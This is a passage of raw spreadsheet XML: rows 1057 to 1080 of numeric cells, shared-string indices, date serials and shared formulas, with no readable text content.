      <c r="J1057" s="1" t="s">
        <v>4550</v>
      </c>
      <c r="K1057" s="2" t="s">
        <v>4551</v>
      </c>
      <c r="L1057" s="1">
        <v>4.0</v>
      </c>
      <c r="M1057" s="1">
        <v>9.0</v>
      </c>
      <c r="N1057" s="1" t="s">
        <v>4559</v>
      </c>
      <c r="O1057" s="1" t="s">
        <v>4553</v>
      </c>
      <c r="P1057" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1057" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1057" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1057" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="1">
        <v>14547.0</v>
      </c>
      <c r="B1058" s="2" t="s">
        <v>4560</v>
      </c>
      <c r="C1058" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1058" s="2" t="s">
        <v>4561</v>
      </c>
      <c r="E1058" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1058" s="1" t="s">
        <v>4562</v>
      </c>
      <c r="G1058" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1058" s="1" t="s">
        <v>4563</v>
      </c>
      <c r="I1058" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1058" s="1" t="s">
        <v>4564</v>
      </c>
      <c r="K1058" s="2" t="s">
        <v>4565</v>
      </c>
      <c r="L1058" s="1">
        <v>22.0</v>
      </c>
      <c r="M1058" s="1">
        <v>23.0</v>
      </c>
      <c r="N1058" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1058" s="1" t="s">
        <v>4566</v>
      </c>
      <c r="P1058" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1058" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1058" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1058" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="1">
        <v>14617.0</v>
      </c>
      <c r="B1059" s="2" t="s">
        <v>4567</v>
      </c>
      <c r="C1059" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1059" s="2" t="s">
        <v>4568</v>
      </c>
      <c r="E1059" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1059" s="1" t="s">
        <v>4569</v>
      </c>
      <c r="G1059" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1059" s="4">
        <v>44052.7375</v>
      </c>
      <c r="I1059" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1059" s="1" t="s">
        <v>4570</v>
      </c>
      <c r="K1059" s="2" t="s">
        <v>4571</v>
      </c>
      <c r="L1059" s="1">
        <v>3.0</v>
      </c>
      <c r="M1059" s="1">
        <v>4.0</v>
      </c>
      <c r="N1059" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1059" s="1" t="s">
        <v>4572</v>
      </c>
      <c r="P1059" s="1" t="s">
        <v>2216</v>
      </c>
      <c r="Q1059" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1059" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1059" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="1">
        <v>14618.0</v>
      </c>
      <c r="B1060" s="2" t="s">
        <v>4573</v>
      </c>
      <c r="C1060" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1060" s="2" t="s">
        <v>4568</v>
      </c>
      <c r="E1060" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F1060" s="1" t="s">
        <v>4574</v>
      </c>
      <c r="G1060" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1060" s="4">
        <v>43900.950694444444</v>
      </c>
      <c r="I1060" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1060" s="1" t="s">
        <v>4570</v>
      </c>
      <c r="K1060" s="2" t="s">
        <v>4571</v>
      </c>
      <c r="L1060" s="1">
        <v>3.0</v>
      </c>
      <c r="M1060" s="1">
        <v>4.0</v>
      </c>
      <c r="N1060" s="1" t="s">
        <v>4575</v>
      </c>
      <c r="O1060" s="1" t="s">
        <v>4572</v>
      </c>
      <c r="P1060" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1060" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1060" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1060" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="1">
        <v>14619.0</v>
      </c>
      <c r="B1061" s="2" t="s">
        <v>4576</v>
      </c>
      <c r="C1061" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1061" s="2" t="s">
        <v>4568</v>
      </c>
      <c r="E1061" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1061" s="1" t="s">
        <v>4577</v>
      </c>
      <c r="G1061" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1061" s="4">
        <v>43931.72222222222</v>
      </c>
      <c r="I1061" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J1061" s="1" t="s">
        <v>4570</v>
      </c>
      <c r="K1061" s="2" t="s">
        <v>4571</v>
      </c>
      <c r="L1061" s="1">
        <v>3.0</v>
      </c>
      <c r="M1061" s="1">
        <v>4.0</v>
      </c>
      <c r="N1061" s="1" t="s">
        <v>4578</v>
      </c>
      <c r="O1061" s="1" t="s">
        <v>4572</v>
      </c>
      <c r="P1061" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1061" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1061" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1061" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="1">
        <v>14621.0</v>
      </c>
      <c r="B1062" s="2" t="s">
        <v>4579</v>
      </c>
      <c r="C1062" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1062" s="2" t="s">
        <v>4580</v>
      </c>
      <c r="E1062" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1062" s="1" t="s">
        <v>4581</v>
      </c>
      <c r="G1062" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1062" s="1" t="s">
        <v>4582</v>
      </c>
      <c r="I1062" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1062" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="K1062" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="L1062" s="1">
        <v>5.0</v>
      </c>
      <c r="M1062" s="1">
        <v>7.0</v>
      </c>
      <c r="N1062" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1062" s="1" t="s">
        <v>4585</v>
      </c>
      <c r="P1062" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1062" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1062" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1062" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="1">
        <v>14623.0</v>
      </c>
      <c r="B1063" s="2" t="s">
        <v>4586</v>
      </c>
      <c r="C1063" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1063" s="2" t="s">
        <v>4580</v>
      </c>
      <c r="E1063" s="2" t="s">
        <v>2241</v>
      </c>
      <c r="F1063" s="1" t="s">
        <v>250</v>
      </c>
      <c r="G1063" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1063" s="1" t="s">
        <v>4587</v>
      </c>
      <c r="I1063" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1063" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="K1063" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="L1063" s="1">
        <v>5.0</v>
      </c>
      <c r="M1063" s="1">
        <v>7.0</v>
      </c>
      <c r="N1063" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="O1063" s="1" t="s">
        <v>4585</v>
      </c>
      <c r="P1063" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1063" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1063" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1063" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="1">
        <v>14624.0</v>
      </c>
      <c r="B1064" s="2" t="s">
        <v>4588</v>
      </c>
      <c r="C1064" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1064" s="2" t="s">
        <v>4580</v>
      </c>
      <c r="E1064" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1064" s="1" t="s">
        <v>4581</v>
      </c>
      <c r="G1064" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1064" s="1" t="s">
        <v>4589</v>
      </c>
      <c r="I1064" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1064" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="K1064" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="L1064" s="1">
        <v>5.0</v>
      </c>
      <c r="M1064" s="1">
        <v>7.0</v>
      </c>
      <c r="N1064" s="1" t="s">
        <v>4590</v>
      </c>
      <c r="O1064" s="1" t="s">
        <v>4585</v>
      </c>
      <c r="P1064" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1064" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1064" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1064" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="1">
        <v>14625.0</v>
      </c>
      <c r="B1065" s="2" t="s">
        <v>4591</v>
      </c>
      <c r="C1065" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1065" s="2" t="s">
        <v>4580</v>
      </c>
      <c r="E1065" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1065" s="1" t="s">
        <v>250</v>
      </c>
      <c r="G1065" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1065" s="1" t="s">
        <v>4592</v>
      </c>
      <c r="I1065" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1065" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="K1065" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="L1065" s="1">
        <v>5.0</v>
      </c>
      <c r="M1065" s="1">
        <v>7.0</v>
      </c>
      <c r="N1065" s="1" t="s">
        <v>1430</v>
      </c>
      <c r="O1065" s="1" t="s">
        <v>4585</v>
      </c>
      <c r="P1065" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1065" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1065" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1065" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="1">
        <v>14626.0</v>
      </c>
      <c r="B1066" s="2" t="s">
        <v>4593</v>
      </c>
      <c r="C1066" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1066" s="2" t="s">
        <v>4580</v>
      </c>
      <c r="E1066" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1066" s="1" t="s">
        <v>4594</v>
      </c>
      <c r="G1066" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1066" s="1" t="s">
        <v>4595</v>
      </c>
      <c r="I1066" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1066" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="K1066" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="L1066" s="1">
        <v>5.0</v>
      </c>
      <c r="M1066" s="1">
        <v>7.0</v>
      </c>
      <c r="N1066" s="1" t="s">
        <v>4127</v>
      </c>
      <c r="O1066" s="1" t="s">
        <v>4585</v>
      </c>
      <c r="P1066" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1066" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1066" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1066" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="1">
        <v>14627.0</v>
      </c>
      <c r="B1067" s="2" t="s">
        <v>4596</v>
      </c>
      <c r="C1067" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1067" s="2" t="s">
        <v>4580</v>
      </c>
      <c r="E1067" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1067" s="1" t="s">
        <v>4597</v>
      </c>
      <c r="G1067" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1067" s="1" t="s">
        <v>4598</v>
      </c>
      <c r="I1067" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1067" s="1" t="s">
        <v>4583</v>
      </c>
      <c r="K1067" s="2" t="s">
        <v>4584</v>
      </c>
      <c r="L1067" s="1">
        <v>5.0</v>
      </c>
      <c r="M1067" s="1">
        <v>7.0</v>
      </c>
      <c r="N1067" s="1" t="s">
        <v>4599</v>
      </c>
      <c r="O1067" s="1" t="s">
        <v>4585</v>
      </c>
      <c r="P1067" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1067" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1067" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1067" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="1">
        <v>14635.0</v>
      </c>
      <c r="B1068" s="2" t="s">
        <v>4600</v>
      </c>
      <c r="C1068" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1068" s="2" t="s">
        <v>4601</v>
      </c>
      <c r="E1068" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1068" s="1" t="s">
        <v>4602</v>
      </c>
      <c r="G1068" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1068" s="4">
        <v>44086.40833333333</v>
      </c>
      <c r="I1068" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1068" s="1" t="s">
        <v>4603</v>
      </c>
      <c r="K1068" s="2" t="s">
        <v>4604</v>
      </c>
      <c r="L1068" s="1">
        <v>10.0</v>
      </c>
      <c r="M1068" s="1">
        <v>13.0</v>
      </c>
      <c r="N1068" s="1" t="s">
        <v>632</v>
      </c>
      <c r="O1068" s="1" t="s">
        <v>4605</v>
      </c>
      <c r="P1068" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1068" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1068" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1068" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="1">
        <v>14640.0</v>
      </c>
      <c r="B1069" s="2" t="s">
        <v>4606</v>
      </c>
      <c r="C1069" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1069" s="2" t="s">
        <v>4601</v>
      </c>
      <c r="E1069" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1069" s="1" t="s">
        <v>4607</v>
      </c>
      <c r="G1069" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1069" s="4">
        <v>44086.90833333333</v>
      </c>
      <c r="I1069" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J1069" s="1" t="s">
        <v>4603</v>
      </c>
      <c r="K1069" s="2" t="s">
        <v>4604</v>
      </c>
      <c r="L1069" s="1">
        <v>10.0</v>
      </c>
      <c r="M1069" s="1">
        <v>13.0</v>
      </c>
      <c r="N1069" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O1069" s="1" t="s">
        <v>4605</v>
      </c>
      <c r="P1069" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1069" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1069" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1069" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="1">
        <v>14645.0</v>
      </c>
      <c r="B1070" s="2" t="s">
        <v>4608</v>
      </c>
      <c r="C1070" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1070" s="2" t="s">
        <v>4609</v>
      </c>
      <c r="E1070" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1070" s="1" t="s">
        <v>4610</v>
      </c>
      <c r="G1070" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1070" s="1" t="s">
        <v>4611</v>
      </c>
      <c r="I1070" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1070" s="1" t="s">
        <v>4612</v>
      </c>
      <c r="K1070" s="2" t="s">
        <v>4613</v>
      </c>
      <c r="L1070" s="1">
        <v>6.0</v>
      </c>
      <c r="M1070" s="1">
        <v>11.0</v>
      </c>
      <c r="N1070" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1070" s="1" t="s">
        <v>4614</v>
      </c>
      <c r="P1070" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1070" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1070" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1070" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="1">
        <v>14646.0</v>
      </c>
      <c r="B1071" s="2" t="s">
        <v>4615</v>
      </c>
      <c r="C1071" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1071" s="2" t="s">
        <v>4609</v>
      </c>
      <c r="E1071" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1071" s="1" t="s">
        <v>993</v>
      </c>
      <c r="G1071" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1071" s="1" t="s">
        <v>4616</v>
      </c>
      <c r="I1071" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1071" s="1" t="s">
        <v>4612</v>
      </c>
      <c r="K1071" s="2" t="s">
        <v>4613</v>
      </c>
      <c r="L1071" s="1">
        <v>6.0</v>
      </c>
      <c r="M1071" s="1">
        <v>11.0</v>
      </c>
      <c r="N1071" s="1" t="s">
        <v>4617</v>
      </c>
      <c r="O1071" s="1" t="s">
        <v>4614</v>
      </c>
      <c r="P1071" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1071" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1071" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1071" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="1">
        <v>14672.0</v>
      </c>
      <c r="B1072" s="2" t="s">
        <v>4618</v>
      </c>
      <c r="C1072" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1072" s="2" t="s">
        <v>4609</v>
      </c>
      <c r="E1072" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F1072" s="1" t="s">
        <v>90</v>
      </c>
      <c r="G1072" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1072" s="1" t="s">
        <v>4619</v>
      </c>
      <c r="I1072" s="1" t="s">
        <v>4620</v>
      </c>
      <c r="J1072" s="1" t="s">
        <v>4621</v>
      </c>
      <c r="K1072" s="2" t="s">
        <v>4622</v>
      </c>
      <c r="L1072" s="1">
        <v>2.0</v>
      </c>
      <c r="M1072" s="1">
        <v>2.0</v>
      </c>
      <c r="N1072" s="1" t="s">
        <v>728</v>
      </c>
      <c r="O1072" s="1" t="s">
        <v>728</v>
      </c>
      <c r="P1072" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1072" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1072" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1072" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="1">
        <v>14694.0</v>
      </c>
      <c r="B1073" s="2" t="s">
        <v>4623</v>
      </c>
      <c r="C1073" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1073" s="2" t="s">
        <v>4624</v>
      </c>
      <c r="E1073" s="2" t="s">
        <v>2547</v>
      </c>
      <c r="F1073" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G1073" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1073" s="4">
        <v>44805.544444444444</v>
      </c>
      <c r="I1073" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1073" s="1" t="s">
        <v>4625</v>
      </c>
      <c r="K1073" s="2" t="s">
        <v>4626</v>
      </c>
      <c r="L1073" s="1">
        <v>4.0</v>
      </c>
      <c r="M1073" s="1">
        <v>5.0</v>
      </c>
      <c r="N1073" s="1" t="s">
        <v>949</v>
      </c>
      <c r="O1073" s="1" t="s">
        <v>4590</v>
      </c>
      <c r="P1073" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1073" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1073" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1073" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="1">
        <v>14955.0</v>
      </c>
      <c r="B1074" s="2" t="s">
        <v>4627</v>
      </c>
      <c r="C1074" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1074" s="2" t="s">
        <v>4628</v>
      </c>
      <c r="E1074" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F1074" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G1074" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1074" s="4">
        <v>44321.73263888889</v>
      </c>
      <c r="I1074" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J1074" s="1" t="s">
        <v>4629</v>
      </c>
      <c r="K1074" s="2" t="s">
        <v>4630</v>
      </c>
      <c r="L1074" s="1">
        <v>1.0</v>
      </c>
      <c r="M1074" s="1">
        <v>1.0</v>
      </c>
      <c r="N1074" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1074" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1074" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1074" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1074" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1074" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="1">
        <v>14956.0</v>
      </c>
      <c r="B1075" s="2" t="s">
        <v>4631</v>
      </c>
      <c r="C1075" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1075" s="2" t="s">
        <v>4632</v>
      </c>
      <c r="E1075" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F1075" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G1075" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1075" s="4">
        <v>44378.91388888889</v>
      </c>
      <c r="I1075" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J1075" s="1" t="s">
        <v>4633</v>
      </c>
      <c r="K1075" s="2" t="s">
        <v>4634</v>
      </c>
      <c r="L1075" s="1">
        <v>1.0</v>
      </c>
      <c r="M1075" s="1">
        <v>1.0</v>
      </c>
      <c r="N1075" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1075" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1075" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1075" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1075" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1075" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="1">
        <v>14957.0</v>
      </c>
      <c r="B1076" s="2" t="s">
        <v>4635</v>
      </c>
      <c r="C1076" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1076" s="2" t="s">
        <v>4636</v>
      </c>
      <c r="E1076" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F1076" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G1076" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1076" s="1" t="s">
        <v>4637</v>
      </c>
      <c r="I1076" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J1076" s="1" t="s">
        <v>4638</v>
      </c>
      <c r="K1076" s="2" t="s">
        <v>4639</v>
      </c>
      <c r="L1076" s="1">
        <v>1.0</v>
      </c>
      <c r="M1076" s="1">
        <v>1.0</v>
      </c>
      <c r="N1076" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1076" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1076" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1076" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1076" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1076" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="1">
        <v>15208.0</v>
      </c>
      <c r="B1077" s="2" t="s">
        <v>4640</v>
      </c>
      <c r="C1077" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1077" s="2" t="s">
        <v>4641</v>
      </c>
      <c r="E1077" s="2" t="s">
        <v>4642</v>
      </c>
      <c r="F1077" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G1077" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1077" s="4">
        <v>44418.104166666664</v>
      </c>
      <c r="I1077" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1077" s="1" t="s">
        <v>4643</v>
      </c>
      <c r="K1077" s="2" t="s">
        <v>4644</v>
      </c>
      <c r="L1077" s="1">
        <v>6.0</v>
      </c>
      <c r="M1077" s="1">
        <v>6.0</v>
      </c>
      <c r="N1077" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1077" s="1" t="s">
        <v>4645</v>
      </c>
      <c r="P1077" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1077" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1077" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1077" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="1">
        <v>15373.0</v>
      </c>
      <c r="B1078" s="2" t="s">
        <v>4646</v>
      </c>
      <c r="C1078" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1078" s="2" t="s">
        <v>4647</v>
      </c>
      <c r="E1078" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1078" s="1" t="s">
        <v>4648</v>
      </c>
      <c r="G1078" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1078" s="1" t="s">
        <v>4649</v>
      </c>
      <c r="I1078" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1078" s="1" t="s">
        <v>4650</v>
      </c>
      <c r="K1078" s="2" t="s">
        <v>4651</v>
      </c>
      <c r="L1078" s="1">
        <v>7.0</v>
      </c>
      <c r="M1078" s="1">
        <v>9.0</v>
      </c>
      <c r="N1078" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1078" s="1" t="s">
        <v>1803</v>
      </c>
      <c r="P1078" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1078" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1078" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1078" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="1">
        <v>15374.0</v>
      </c>
      <c r="B1079" s="2" t="s">
        <v>4652</v>
      </c>
      <c r="C1079" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1079" s="2" t="s">
        <v>4647</v>
      </c>
      <c r="E1079" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1079" s="1" t="s">
        <v>1919</v>
      </c>
      <c r="G1079" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1079" s="1" t="s">
        <v>4653</v>
      </c>
      <c r="I1079" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1079" s="1" t="s">
        <v>4650</v>
      </c>
      <c r="K1079" s="2" t="s">
        <v>4651</v>
      </c>
      <c r="L1079" s="1">
        <v>7.0</v>
      </c>
      <c r="M1079" s="1">
        <v>9.0</v>
      </c>
      <c r="N1079" s="1" t="s">
        <v>2371</v>
      </c>
      <c r="O1079" s="1" t="s">
        <v>1803</v>
      </c>
      <c r="P1079" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1079" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1079" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1079" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="1">
        <v>15375.0</v>
      </c>
      <c r="B1080" s="2" t="s">
        <v>4654</v>
      </c>
      <c r="C1080" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1080" s="2" t="s">
        <v>4647</v>
      </c>
      <c r="E1080" s="2" t="s">
